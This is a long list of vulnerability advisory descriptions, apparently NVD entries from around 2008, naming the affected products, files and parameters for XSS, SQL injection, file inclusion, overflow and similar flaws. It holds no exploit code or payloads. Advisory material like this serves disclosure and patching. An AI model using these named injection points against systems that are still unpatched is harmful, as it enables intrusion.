Cross-site scripting (XSS) vulnerability in index.php in JV2 Quick Gallery 1.1 allows remote attackers to inject arbitrary web script or HTML via the f parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in index.php in JV2 Folder Gallery 3.1 allows remote attackers to inject arbitrary web script or HTML via the image parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in Mondo Rescue before 2.2.5 has unknown impact and attack vectors, related to the use of (1) /tmp and (2) MINDI_CACHE.
Multiple SQL injection vulnerabilities in CuteFlow 2.10.0 allow remote authenticated users to execute arbitrary SQL commands via the (1) listid parameter to pages/editmailinglist_step1.php, the (2) userid parameter to pages/edituser.php, the (3) fieldid parameter to pages/editfield.php, and the (4) templateid to pages/edittemplate_step1.php.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple PHP remote file inclusion vulnerabilities in GeeCarts allow remote attackers to execute arbitrary PHP code via a URL in the id parameter to (1) show.php, (2) search.php, and (3) view.php.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple cross-site scripting (XSS) vulnerabilities in GeeCarts allow remote attackers to inject arbitrary web script or HTML via the id parameter to (1) show.php, (2) search.php, and (3) view.php.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
The arrayShrink function (lib/Array.c) in Squid 2.6.STABLE17 allows attackers to cause a denial of service (process exit) via unknown vectors that cause an array to shrink to 0 entries, which triggers an assert error. NOTE: this issue is due to an incorrect fix for CVE-2007-6239.
The WPAR system call implementation in the kernel in IBM AIX 6.1 allows local users to cause a denial of service via unknown calls that trigger "undefined behavior."
Cross-site scripting (XSS) vulnerability in Search.do in ManageEngine Applications Manager 8.x allows remote attackers to inject arbitrary web script or HTML via the query parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in the Datsogallery (com_datsogallery) 1.3.1 module for Joomla! and Mambo allows remote attackers to execute arbitrary SQL commands via the id parameter in a detail action to index.php.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in searchAction.do in ManageEngine EventLog Analyzer 5 allows remote attackers to inject arbitrary web script or HTML via the searchText parameter. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information. Fixed in EventLog Analyzer 10.0 Build 10000.
Unspecified vulnerability in the XML-RPC Blogger API plugin in Joomla! 1.5 allows remote attackers to perform unauthorized article operations on articles via unknown vectors.
Multiple PHP remote file inclusion vulnerabilities in ooComments 1.0 allow remote attackers to execute arbitrary PHP code via a URL in the PathToComment parameter for (1) classes/class_admin.php and (2) classes/class_comments.php.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in setup.php3 in phpHeaven phpMyChat 0.14.5 allows remote attackers to inject arbitrary web script or HTML via the Lang parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in index.php in TinyPortal 0.8.6 and 1.0.3 allows remote attackers to inject arbitrary web script or HTML via the PHPSESSID parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in index.php in webSPELL 4.1.2 allows remote attackers to inject arbitrary web script or HTML via the board parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in index.php in cyberfrogs.net cfnetgs 0.24 allows remote attackers to inject arbitrary web script or HTML via the directory parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple unspecified vulnerabilities in Roundup before 1.4.4 have unknown impact and attack vectors, some of which may be related to cross-site scripting (XSS).
Gallarific Free Edition 1.1 does not require authentication for (1) photos.php, (2) comments.php, and (3) gallery.php in gadmin/, which allows remote attackers to edit objects via a direct request, different vectors than CVE-2008-1327.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple PHP remote file inclusion vulnerabilities in W-Agora 4.0 allow remote attackers to execute arbitrary PHP code via a URL in the bn_dir_default parameter to (1) add_user.php, (2) create_forum.php, (3) create_user.php, (4) delete_notes.php, (5) delete_user.php, (6) edit_forum.php, (7) mail_users.php, (8) moderate_notes.php, and (9) reorder_forums.php.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple SQL injection vulnerabilities in Gallarific Free Edition 1.1 allow remote attackers to execute arbitrary SQL commands via the (1) query parameter to (a) search.php; (2) gusername and (3) gpassword parameters to (b) login.php; and the (4) username and (5) password parameters to (c) gadmin/index.php in a signin action.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in Microsoft DNS in Windows 2000 SP4, Server 2003 SP1 and SP2, and Server 2008 allows remote attackers to conduct cache poisoning attacks via unknown vectors related to accepting "records from a response that is outside the remote server's authority," aka "DNS Cache Poisoning Vulnerability," a different vulnerability than CVE-2008-1447.
Cross-site scripting (XSS) vulnerability in SolutionSearch.do in ManageEngine SupportCenter Plus 7.0.0 allows remote attackers to inject arbitrary web script or HTML via the searchText parameter, a related issue to CVE-2008-1299.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple cross-site scripting (XSS) vulnerabilities in index.php in Clansphere 2008 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
The default configuration of VMware Workstation 6.0.2, VMware Player 2.0.x before 2.0.3, and VMware ACE 2.0.x before 2.0.1 makes the console of the guest OS accessible through anonymous VIX API calls, which has unknown impact and attack vectors.
libpng 1.0.6 through 1.0.32, 1.2.0 through 1.2.26, and 1.4.0beta01 through 1.4.0beta19 allows context-dependent attackers to cause a denial of service (crash) and possibly execute arbitrary code via a PNG file with zero length "unknown" chunks, which trigger an access of uninitialized memory.
Buffer overflow in the gif_read_lzw function in CUPS 1.3.6 allows remote attackers to have an unknown impact via a GIF file with a large code_size value, a similar issue to CVE-2006-4484.
Absolute path traversal vulnerability in install/index.php in Drake CMS 0.4.11 RC8 allows remote attackers to read and execute arbitrary files via a full pathname in the d_root parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
PHP remote file inclusion vulnerability in index.php in wildmary Yap Blog 1.1 allows remote attackers to execute arbitrary PHP code via a URL in the page parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in Nagios before 2.11 allows remote attackers to inject arbitrary web script or HTML via unknown vectors to unspecified CGI scripts, a different issue than CVE-2007-5624.
Unspecified vulnerability in xscreensaver in Sun Solaris 10 Java Desktop System (JDS), when using the GNOME On-Screen Keyboard (GOK), allows local users to bypass authentication via unknown vectors that cause the screen saver to crash.
Cross-site scripting (XSS) vulnerability in index.php in Jeebles Technology Jeebles Directory 2.9.60 allows remote attackers to inject arbitrary web script or HTML via the path parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Directory traversal vulnerability in (1) pkgadd and (2) pkgrm in SCO UnixWare 7.1.4 allows local users to gain privileges via unknown vectors.
Multiple cross-site scripting (XSS) vulnerabilities in the search feature in Polymita BPM-Suite and CollagePortal allow remote attackers to inject arbitrary web script or HTML via the (1) _q and (2) lucene_index_field_value parameters.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in SearchResults.aspx in LaGarde StoreFront 6 before SP8 allows remote attackers to execute arbitrary SQL commands via the CategoryId parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Gallarific does not require authentication for (1) users.php and (2) index.php, which allows remote attackers to add and edit tasks via a direct request.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in search.php in Gallarific allows remote attackers to inject arbitrary web script or HTML via the query parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple cross-site scripting (XSS) vulnerabilities in Savvy Content Manager (CM) allow remote attackers to inject arbitrary web script or HTML via the searchterms parameter to (1) searchresults.cfm, (2) search_results.cfm, and (3) search_results/index.cfm.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in SolutionSearch.do in ManageEngine ServiceDesk Plus 7.0.0 Build 7011 for Windows allows remote attackers to inject arbitrary web script or HTML via the searchText parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple cross-site scripting (XSS) vulnerabilities in EncapsGallery 1.11.2 allow remote attackers to inject arbitrary web script or HTML via the file parameter to (1) watermark.php and (2) catalog_watermark.php in core/.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in Sun Java Web Console 3.0.2, 3.0.3, and 3.0.4 allows remote attackers to bypass intended access restrictions and determine the existence of files or directories via unknown vectors.
Cross-site scripting (XSS) vulnerability in Sun Java Server Faces (JSF) 1.2 before 1.2_08 allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
Multiple cross-site scripting (XSS) vulnerabilities in imageVue 1.7 allow remote attackers to inject arbitrary web script or HTML via the path parameter to (1) popup.php, (2) test/dir2.php, (3) admin/upload.php, and (4) dirxml.php in upload/.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple unspecified vulnerabilities in Mozilla Firefox before 2.0.0.13, Thunderbird before 2.0.0.13, and SeaMonkey before 1.1.9 allow remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via unknown vectors related to the JavaScript engine.
Multiple unspecified vulnerabilities in Mozilla Firefox before 2.0.0.13, Thunderbird before 2.0.0.13, and SeaMonkey before 1.1.9 allow remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via unknown vectors related to the layout engine.
Unspecified vulnerability in Mozilla Firefox before 2.0.0.13, Thunderbird before 2.0.0.13, and SeaMonkey before 1.1.9 allows remote attackers to execute arbitrary code via unknown vectors that cause JavaScript to execute with the wrong principal, aka "Privilege escalation via incorrect principals."
Cross-site scripting (XSS) vulnerability in account.php in BosClassifieds Classified Ads System 3.0 allows remote attackers to inject arbitrary web script or HTML via the returnTo parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in the 4nChat 0.91 module for PHP-Nuke allows remote attackers to execute arbitrary SQL commands via the roomid parameter in an index action to modules.php.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
MRcgi/MRProcessIncomingForms.pl in Numara FootPrints 8.1 on Linux allows remote attackers to execute arbitrary code via shell metacharacters in the PROJECTNUM parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in Numara FootPrints for Linux 8.1 allows remote attackers to inject arbitrary web script or HTML via the Title form field when setting an appointment.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in set_permissions.php in Podcast Generator 0.96.2 allows remote attackers to inject arbitrary web script or HTML via the scriptlang parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in BosDates 3.x and 4.x allows remote attackers to inject arbitrary web script or HTML via (1) the type parameter in calendar.php and (2) the category parameter in calendar_search.php.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in redirect.do in Xitex WebContent M1 allows remote attackers to inject arbitrary web script or HTML via the sid parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in the web management interface in Adobe LiveCycle Workflow 6.2 allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
Multiple unspecified vulnerabilities in the color management library in Sun JDK and JRE 6 Update 4 and earlier, and 5.0 Update 14 and earlier, allows remote attackers to cause a denial of service (crash) via unknown vectors.
Unspecified vulnerability in the Java Plug-in for Sun JDK and JRE 6 Update 4 and earlier, and 5.0 Update 14 and earlier; and SDK and JRE 1.4.2_16 and earlier, and 1.3.1_21 and earlier; allows remote attackers to bypass the same origin policy and "execute local applications" via unknown vectors.
Buffer overflow in Java Web Start in Sun JDK and JRE 6 Update 4 and earlier, 5.0 Update 14 and earlier, and SDK/JRE 1.4.2_16 and earlier allows remote attackers to execute arbitrary code via unknown vectors, a different issue than CVE-2008-1188, aka the "third" issue.
Unspecified vulnerability in Sun Java Runtime Environment (JRE) and JDK 6 Update 4 and earlier, 5.0 Update 14 and earlier, and SDK/JRE 1.4.2_16 and earlier allows remote attackers to cause a denial of service (JRE crash) and possibly execute arbitrary code via unknown vectors related to XSLT transforms.
Cross-site scripting (XSS) vulnerability in AuthentiX 6.3b1 Trial allows remote attackers to inject arbitrary web script or HTML via the username parameter to aspAdmin/deleteUser.asp, a different vector than CVE-2008-1174.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in Squid Analysis Report Generator (Sarg) 2.2.3.1 allows remote attackers to inject arbitrary web script or HTML via the User-Agent header, which is not properly handled when displaying the Squid proxy log.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple unspecified vulnerabilities in the SSH server in Cisco IOS 12.4 allow remote attackers to cause a denial of service (device restart) via unknown vectors, aka Bug ID (1) CSCsk42419, (2) CSCsk60020, and (3) CSCsh51293.
Multiple unspecified vulnerabilities in Blender have unknown impact and attack vectors, related to "temporary file issues."
Unspecified vulnerability in the Internet Protocol (IP) implementation in Sun Solaris 8, 9, and 10 allows remote attackers to bypass intended firewall policies or cause a denial of service (panic) via unknown vectors, possibly related to ICMP packets and IP fragment reassembly.
Unspecified vulnerability in the kernel in Microsoft Windows 2000 SP4, XP SP2, Server 2003 SP1 and SP2, through Vista SP1, and Server 2008 allows local users to execute arbitrary code via unknown vectors related to improper input validation.  NOTE: it was later reported that one affected function is NtUserFnOUTSTRING in win32k.sys.
Cross-site scripting (XSS) vulnerability in search.php in Interspire Shopping Cart 1.x allows remote attackers to inject arbitrary web script or HTML via the search_query parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in index.php in Maian Cart 1.1 allows remote attackers to inject arbitrary web script or HTML via the keywords parameter in a search command.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple SQL injection vulnerabilities in index.php in the XM-Memberstats (xmmemberstats) 2.0e module for XOOPS allow remote attackers to execute arbitrary SQL commands via the (1) letter or (2) sortby parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
InterVideo IMC Server (aka IMCSvr.exe) and InterVideo Home Theater (aka IHT.exe) in InterVideo WinDVD Media Center 2.11.15.0 allow remote attackers to cause a denial of service (NULL dereference and application crash) via a crafted packet with two CRLF sequences.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in Parallels SiteStudio before 1.7.2, and 1.8.x before 1.8b, as used in Parallels H-Sphere 3.0 before Patch 9 and 2.5 before Patch 11, has unknown impact and attack vectors.
Cross-site scripting (XSS) vulnerability in WebCore, as used in Apple Safari before 3.1, allows remote attackers to inject arbitrary web script or HTML via unknown vectors related to the Web Inspector.
Cross-site scripting (XSS) vulnerability in WebCore, as used in Apple Safari before 3.1, allows remote attackers to inject arbitrary web script or HTML via unknown vectors related to sites that set the document.domain property or have the same document.domain.
A vulnerability was found in iGamingModules flashgames 1.1.0. It has been classified as critical. Affected is an unknown function of the file game.php. The manipulation of the argument lid leads to sql injection. It is possible to launch the attack remotely. The name of the patch is 6e57683704885be32eea2ea614f80c9bb8f012c5. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-222288.
A vulnerability has been found in cfire24 ajaxlife up to 0.3.2 and classified as problematic. This vulnerability affects unknown code. The manipulation leads to cross site scripting. The attack can be initiated remotely. Upgrading to version 0.3.3 is able to address this issue. The patch is identified as 9fb53b67312fe3f4336e01c1e3e1bedb4be0c1c8. It is recommended to upgrade the affected component. VDB-222286 is the identifier assigned to this vulnerability.
Buffer overflow in Double-Take (aka HP StorageWorks Storage Mirroring) 4.5.0.1629, and other 4.5.0.x versions, allows remote attackers to have an unknown impact via a packet with a long string in the username field.
SQL injection vulnerability in includes/count_dl_or_link.inc.php in the astatsPRO (com_astatspro) 1.0.1 component for Joomla! allows remote attackers to execute arbitrary SQL commands via the id parameter to getfile.php, a different vector than CVE-2008-0839. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in browse.asp in Schoolwires Academic Portal allows remote attackers to inject arbitrary web script or HTML via the c parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in browse.asp in Schoolwires Academic Portal allows remote attackers to execute arbitrary SQL commands via the c parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Session fixation vulnerability in BEA WebLogic Server and Express 8.1 SP4 through SP6, 9.2 through MP1, and 10.0 allows remote authenticated users to hijack web sessions via unknown vectors.
Red Hat Directory Server 7.1 before SP4 uses insecure permissions for certain directories, which allows local users to modify JAR files and execute arbitrary code via unknown vectors.
The NEEDBITS macro in the inflate_dynamic function in inflate.c for unzip can be invoked using invalid buffers, which allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via unknown vectors that trigger a free of uninitialized or previously-freed data.
Cross-site scripting (XSS) vulnerability in Groupspace in BEA WebLogic Portal 10.0 and 9.2 through Maintenance Pack 1 allows remote authenticated users to inject arbitrary web script or HTML via unknown vectors.
Unspecified vulnerability in BEA WebLogic Portal 8.1 through SP6 allows remote attackers to bypass entitlements for instances of a floatable WLP portlet via unknown vectors.
Unspecified vulnerability in the AVG plugin in Kerio MailServer before 6.5.0 has unspecified impact via unknown remote attack vectors related to null DACLs.
Multiple SQL injection vulnerabilities in e-Vision CMS 2.02 allow remote attackers to execute arbitrary SQL commands via the id parameter to (1) iframe.php and (2) print.php.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in the php2phps function in Claroline before 1.8.9 has unknown impact and attack vectors.
Unspecified vulnerability in the Header Image Module before 5.x-1.1 for Drupal allows remote attackers to access the administration pages via unknown attack vectors.
Cross-site scripting (XSS) vulnerability in search.cgi in Loris Hotel Reservation System 3.01 and possibly earlier allows remote attackers to inject arbitrary web script or HTML via the hotel_name parameter. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in the PropFilePasswordEncoder utility in IBM WebSphere Application Server (WAS) before 6.0.2 Fix Pack 25 (6.0.2.25) has unknown impact and attack vectors.
Multiple SQL injection vulnerabilities in CandyPress (CP) 4.1.1.26, and earlier 4.1.x versions, allow remote attackers to execute arbitrary SQL commands via the (1) idcust parameter to (a) ajax_getTiers.asp and (b) ajax_getCust.asp in ajax/, and the (2) tableName parameter to (c) ajax/ajax_tableFields.asp.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
The unmew11 function in libclamav/mew.c in libclamav in ClamAV before 0.92.1 has unknown impact and attack vectors that trigger "heap corruption."
Cross-site scripting (XSS) vulnerability in index.php in Pagetool 1.0.7 allows remote attackers to inject arbitrary web script or HTML via the search_term parameter in a pagetool_search action.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in the FTP server for HP-UX B.11.11, B.11.23, and B.11.31 allows remote authenticated users to cause a denial of service (FTP server outage) via unknown attack vectors.
Unspecified vulnerability in the embedded management console in HP iLO-2 Management Processors (iLO-2 MP), as used in Integrity Servers rx2660, rx3600, and rx6600, and Integrity Blade Server model bl860c, allows remote attackers to cause a denial of service via unknown vectors.
Multiple unspecified vulnerabilities in HP Select Identity 4.00, 4.01, 4.11, 4.12, 4.13, and 4.20 allow remote authenticated users to access other user accounts via unknown vectors, a different issue than CVE-2008-0214.
Unspecified vulnerability in the SSH server in HP OpenVMS TCP/IP Services on OpenVMS on the Alpha platform with 5.4 before ECO 7, and on the Integrity and Alpha platforms with 5.5 before ECO 3 and 5.6 before ECO 2, allows remote attackers to obtain unspecified access via unknown vectors.
ActivationHandler in Magnolia CE 3.5.x before 3.5.4 does not check permissions during importing, which allows remote attackers to have an unknown impact via activation of a new item, possibly involving addition of arbitrary new content.
Cross-site scripting (XSS) vulnerability in search.php in Crux Software CruxCMS 3.0 allows remote attackers to inject arbitrary web script or HTML via the search parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Buffer overflow in the DAS server in IBM DB2 UDB before 8.2 Fixpak 16 has unknown attack vectors, and an impact probably involving "invalid memory access."
IBM DB2 UDB before 8.2 Fixpak 16 does not properly check authorization for the ALTER TABLE statement, which has unknown impact and attack vectors.
Cross-site scripting (XSS) vulnerability in search.cgi in Sift Unity allows remote attackers to inject arbitrary web script or HTML via the qt parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
The XML-RPC implementation (xmlrpc.php) in WordPress before 2.3.3, when registration is enabled, allows remote attackers to edit posts of other blog users via unknown vectors.
Multiple unspecified vulnerabilities in Adobe Reader and Acrobat before 8.1.2 have unknown impact and attack vectors.
SQL injection vulnerability in login.php in Pedro Santana Codice CMS allows remote attackers to execute arbitrary SQL commands via the username field.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in login.php in Simple OS CMS 0.1c beta allows remote attackers to execute arbitrary SQL commands via the username field.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple PHP remote file inclusion vulnerabilities in Portail Web Php 2.5.1.1 allow remote attackers to execute arbitrary PHP code via a URL in the site_path parameter to (1) config/conf-activation.php, (2) menu/item.php, and (3) modules/conf_modules.php in admin/system/; and (4) system/login.php.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in the delivery engine in Openads 2.4.0 through 2.4.2 allows remote attackers to execute arbitrary PHP code via unknown vectors.
Multiple cross-site scripting (XSS) vulnerabilities in the DMSGuestbook 1.8.0 and 1.7.0 plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) gbname, (2) gbemail, (3) gburl, and (4) gbmsg parameters to unspecified programs.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in index.php in the Sigsiu Online Business Index 2 (SOBI2, com_sobi2) 2.5.3 component for Joomla! and Mambo allows remote attackers to execute arbitrary SQL commands via the catid parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in the 32-bit and 64-bit emulation in the Linux kernel 2.6.9, 2.6.18, and probably other versions allows local users to read uninitialized memory via unknown vectors involving a crafted binary.
Cross-site scripting (XSS) vulnerability in Uniwin eCart Professional before 2.0.16 allows remote attackers to inject arbitrary web script or HTML via the rp parameter to cartView.asp and unspecified other components.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in the Supervisor Engine 32 (Sup32), Supervisor Engine 720 (Sup720), and Route Switch Processor 720 (RSP720) for multiple Cisco products, when using Multi Protocol Label Switching (MPLS) VPN and OSPF sham-link, allows remote attackers to cause a denial of service (blocked queue, device restart, or memory leak) via unknown vectors.
Multiple cross-site scripting (XSS) vulnerabilities in SoftCart.exe in SoftCart 5.1.2.2 allow remote attackers to inject arbitrary web script or HTML via the (1) License_Plate, (2) License_State, (3) Ticket_Date, and (4) Ticket_Number parameters.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
PHP remote file inclusion vulnerability in spaw/dialogs/confirm.php in SQLiteManager 1.2.0 allows remote attackers to execute arbitrary PHP code via a URL in the spaw_root parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple unspecified vulnerabilities in Mambo LaiThai 4.5.5 have unknown impact and attack vectors related to (1) mod_login and (2) mod_template_chooser.
Cross-site scripting (XSS) vulnerability in vpnum/userslist.php in Endian Firewall 2.1.2 allows remote attackers to inject arbitrary web script or HTML via the psearch parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
ManageEngine Applications Manager 8.1 build 8100 does not check authentication for monitorType.do and unspecified other pages, which allows remote attackers to obtain sensitive information and change settings via unspecified vectors.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
ManageEngine Applications Manager 8.1 build 8100 allows remote attackers to obtain sensitive information ( Home-&gt;Summary) via an invalid URI, as demonstrated by the "/-" URI.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple cross-site scripting (XSS) vulnerabilities in ManageEngine Applications Manager 8.1 build 8100 allow remote attackers to inject arbitrary web script or HTML via the (1) showlink parameter to jsp/DiscoveryProfiles.jsp; the (2) attributeIDs, (3) attributeToSelect, (4) redirectto, and (5) resourceid parameters to (a) jsp/ThresholdActionConfiguration.jsp; the (6) page and (7) redirect parameters to (b) jsp/UpdateGlobalSettings.jsp; and the (8) haid and (9) returnpath parameters to (c) showTile.do.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unrestricted file upload vulnerability in the FileUpload class running on the Symantec LiveState Apache Tomcat server, as used by Symantec Backup Exec System Recovery Manager 7.0 and 7.0.1, allows remote attackers to upload and execute arbitrary JSP files via unknown vectors.
SQL injection vulnerability in paypalresult.asp in VP-ASP Shopping Cart 6.50 and earlier allows remote attackers to execute arbitrary SQL commands via unspecified vectors.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
PHP remote file inclusion vulnerability in inc/linkbar.php in Small Axe Weblog 0.3.1 allows remote attackers to execute arbitrary PHP code via a URL in the ffile parameter, a different vector than CVE-2008-0376.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in IBM WebSphere Business Modeler Basic and Advanced 6.0.2.1 before Interim Fix 11 allows remote authenticated users to bypass intended access restrictions and delete unspecified repository resources via unknown vectors, even when they are not administrators or members of the repository's owning group.
Unspecified vulnerability in the serveServletsByClassnameEnabled feature in IBM WebSphere Application Server (WAS) 6.0 through 6.0.2.25, 6.1 through 6.1.0.14, and 5.1.1.x before 5.1.1.18 has unknown impact and attack vectors.
Unspecified vulnerability in Mahara before 0.9.1 has unknown impact and remote attack vectors, probably related to cross-site scripting (XSS) in uploaded files.
Unspecified vulnerability in the PeopleTools component in Oracle PeopleSoft Enterprise and JD Edwards EnterpriseOne 8.48.15 and 8.49.07 has unknown impact and remote attack vectors, aka PSE02.
Multiple unspecified vulnerabilities in the PeopleTools component in Oracle PeopleSoft Enterprise and JD Edwards EnterpriseOne 8.22.18, 8.48.15, and 8.49.07 have unknown impact and remote attack vectors, aka (1) PSE01, (2) PSE03, and (3) PSE04.
Unspecified vulnerability in the Oracle Ultra Search component in Oracle Collaboration Suite 10.1.2; Database 9.2.0.8, 10.1.0.5, and 10.2.0.3; and Application Server 9.0.4.3 and 10.1.2.0.2; has unknown impact and local attack vectors, aka OCS01.  NOTE: Oracle has not disputed a reliable claim that this issue is related to WKSYS schema privileges.
Unspecified vulnerability in the Oracle Jinitiator component in Oracle Application Server 1.3.1.27 and E-Business Suite 11.5.10.2 has unknown impact and remote attack vectors, aka AS01.
Unspecified vulnerability in the Core RDBMS component in Oracle Database 11.1.0.6 has unknown impact and remote attack vectors, aka DB08.
Unspecified vulnerability in the Oracle Spatial component in Oracle Database 10.1.0.5 and 10.2.0.3 has unknown impact and remote attack vectors, aka DB07.
Unspecified vulnerability in the Oracle Spatial component in Oracle Database 9.0.1.5 FIPS+, 9.2.0.8, 9.2.0.8DV, and 10.1.0.5 has unknown impact and remote attack vectors, aka DB06.
Unspecified vulnerability in the Upgrade/Downgrade component in Oracle Database 9.2.0.8, 10.1.0.5, and 10.2.0.3 has unknown impact and remote attack vectors, aka DB05.
Unspecified vulnerability in the Advanced Queuing component in Oracle Database 9.0.1.5 FIPS+ and 10.1.0.5 has unknown impact and remote attack vectors, aka DB03.
Multiple unspecified vulnerabilities in Oracle Database 9.0.1.5 FIPS+, 9.2.0.8, 9.2.0.8DV, 10.1.0.5, and 10.2.0.3 have unknown impact and remote attack vectors, related to the (1) Advanced Queuing component (DB02) and (2) Oracle Spatial component (DB04).
Unspecified vulnerability in the XML DB component in Oracle Database 9.2.0.8, 9.2.0.8DV, 10.1.0.5, and 10.2.0.3 has unknown impact and remote attack vectors, aka DB01.
Integer signedness error in vserver in SAP MaxDB 7.6.0.37, and possibly other versions, allows remote attackers to execute arbitrary code via unknown vectors that trigger heap corruption.
Cross-site scripting (XSS) vulnerability in photo_album.pl in Dansie Photo Album 1.0 allows remote attackers to inject arbitrary web script or HTML via the search parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in search.pl in Dansie Search Engine 2.7 allows remote attackers to inject arbitrary web script or HTML via the keywords parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unrestricted file upload vulnerability in PhotoPost vBGallery before 2.4.2 allows remote attackers to upload and execute arbitrary files via unknown vectors.
Unspecified vulnerability in Lotus Domino 7.0.2 before Fix Pack 3 allows attackers to cause a denial of service via unknown vectors.
Unspecified vulnerability in libdevinfo in Sun Solaris 10 allows local users to access files and gain privileges via unknown vectors, related to login device permissions.
Multiple heap-based buffer overflows in the rmff_dump_cont function in input/libreal/rmff.c in xine-lib 1.1.9 allow remote attackers to execute arbitrary code via the SDP (1) Title, (2) Author, or (3) Copyright attribute, related to the rmff_dump_header function, different vectors than CVE-2008-0225.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in admin/index.html in Merak IceWarp Mail Server allows remote attackers to inject arbitrary web script or HTML via the message parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple unspecified vulnerabilities in HP Storage Essentials Storage Resource Management (SRM) before 6.0.0 allow remote attackers to obtain unspecified access to a managed device via unknown attack vectors.
Multiple unspecified vulnerabilities in HP Select Identity 4.00, 4.01, 4.11, 4.12, 4.13, and 4.20 allow remote authenticated users to gain access via unknown vectors.
Unspecified vulnerability in a certain ActiveX control for HP Virtual Rooms (HPVR) 6 and earlier allows remote attackers to execute arbitrary code via unknown vectors.
